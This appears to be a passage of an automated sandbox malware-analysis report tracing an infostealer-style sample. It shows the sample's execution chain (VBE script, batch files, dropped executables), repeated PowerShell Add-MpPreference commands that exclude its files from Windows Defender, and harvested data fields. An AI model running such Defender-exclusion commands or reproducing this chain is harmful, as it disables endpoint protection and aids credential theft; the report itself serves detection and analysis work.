Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007CC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_007CC220
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007DB348 FindFirstFileExA,	0_2_007DB348

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_007CE6A3 VirtualQuery,GetSystemInfo,

0_2_007CE6A3

Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 30000
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 600000
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 599871
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 597953
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 597360
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 3600000
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 596912
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 595188
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 594969
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 594766
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 594516
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 593688
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 593391
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 593008
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 592890
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 592781
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 592657
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 592360
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 592172
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 591625
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 591406
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 591276
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 591166
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 591047
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 590915
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 590797
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 590687
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 590577
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 590462
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 590325
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 590164
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 589969
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 589778
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 589672
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 589323
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 588063
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 587937
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 587828
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 587719
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 587609
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 587500
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 587390
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 587279
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 587172
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 587057
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 586938
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 586813
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 586688
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 586578
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 586469
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 586344
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 586235
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 586080
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 585940
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 585813
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 585687
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 585578
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 922337203685477

Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: oQqq3TSPp6.32.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: oQqq3TSPp6.32.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: oQqq3TSPp6.32.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: oQqq3TSPp6.32.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: oQqq3TSPp6.32.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: oQqq3TSPp6.32.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: DtJTopEKFGnyRQt.exe, 00000020.00000002.3514807736.000000001CA5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,V?
Source: svchost.exe, 0000002C.00000002.3379333425.0000021BDCC5B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: oQqq3TSPp6.32.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: oQqq3TSPp6.32.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: oQqq3TSPp6.32.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: oQqq3TSPp6.32.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: oQqq3TSPp6.32.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: oQqq3TSPp6.32.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: oQqq3TSPp6.32.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: oQqq3TSPp6.32.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: oQqq3TSPp6.32.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: oQqq3TSPp6.32.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: oQqq3TSPp6.32.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: oQqq3TSPp6.32.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: oQqq3TSPp6.32.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: wscript.exe, 00000002.00000003.2150414343.000000000317B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\A8
Source: oQqq3TSPp6.32.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: DtJTopEKFGnyRQt.exe, 00000020.00000002.3504949917.000000001BBC0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
Source: oQqq3TSPp6.32.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: wscript.exe, 00000002.00000003.2150414343.000000000317B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: oQqq3TSPp6.32.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: oQqq3TSPp6.32.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: oQqq3TSPp6.32.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: oQqq3TSPp6.32.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: oQqq3TSPp6.32.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: oQqq3TSPp6.32.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: oQqq3TSPp6.32.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: chainportruntimeCrtMonitor.exe, 00000005.00000002.2243229857.000000001B656000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\hWZ
Source: oQqq3TSPp6.32.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: chainportruntimeCrtMonitor.exe, 00000005.00000002.2243229857.000000001B656000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000002C.00000002.3377324831.0000021BD762B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: oQqq3TSPp6.32.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: oQqq3TSPp6.32.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe

API call chain: ExitProcess graph end node

graph_0-25145

Source: C:\MsContainer\chainportruntimeCrtMonitor.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_007CF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_007CF838

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_007D7DEE mov eax, dword ptr fs:[00000030h]

0_2_007D7DEE

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_007DC030 GetProcessHeap,

0_2_007DC030

Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Process token adjusted: Debug
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Process token adjusted: Debug
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007CF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_007CF838
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007CF9D5 SetUnhandledExceptionFilter,	0_2_007CF9D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007CFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_007CFBCA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007D8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_007D8EBD

Source: C:\MsContainer\chainportruntimeCrtMonitor.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Media\Heritage\DtJTopEKFGnyRQt.exe'
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\WmiPrvSE.exe'
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe'
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\DtJTopEKFGnyRQt.exe'
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MsContainer\sppsvc.exe'
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Media\Heritage\DtJTopEKFGnyRQt.exe'	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\WmiPrvSE.exe'	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe'	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\DtJTopEKFGnyRQt.exe'	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MsContainer\sppsvc.exe'	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\MsContainer\iceJ1UmfnosxAG3hkAOO7zmCT1vAJ8icZlmWEOQE.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\MsContainer\zXrLq55h.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\MsContainer\chainportruntimeCrtMonitor.exe "C:\MsContainer/chainportruntimeCrtMonitor.exe"	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Media\Heritage\DtJTopEKFGnyRQt.exe'	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\WmiPrvSE.exe'	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe'	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\DtJTopEKFGnyRQt.exe'	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MsContainer\sppsvc.exe'	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xDLjJLJ5P2.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe "C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe"

Source: DtJTopEKFGnyRQt.exe, 00000020.00000002.3386767298.000000000389D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N"},"5.0.4",5,1,"","user","445817","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Recovery","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.228","US /
Source: DtJTopEKFGnyRQt.exe, 00000020.00000002.3386767298.000000000389D000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3386767298.0000000003465000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: DtJTopEKFGnyRQt.exe, 00000020.00000002.3386767298.000000000389D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: [{"Has Crypto Wallets (fff5)":"N","Crypto Extensions (fff5)":"N","Crypto Clients (fff5)":"N","Cookies Count (1671)":"2","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N"},"5.0.4",5,1,"","user","445817","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Recovery","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.228","US / United States","New York / New York","40.7123 / -74.0068"]
Source: DtJTopEKFGnyRQt.exe, 00000020.00000002.3386767298.0000000003546000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@P
Source: DtJTopEKFGnyRQt.exe, 00000020.00000002.3386767298.0000000003465000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_007CF654 cpuid

0_2_007CF654

Source: C:\Users\user\Desktop\file.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_007CAF0F

Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Queries volume information: C:\MsContainer\chainportruntimeCrtMonitor.exe VolumeInformation	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
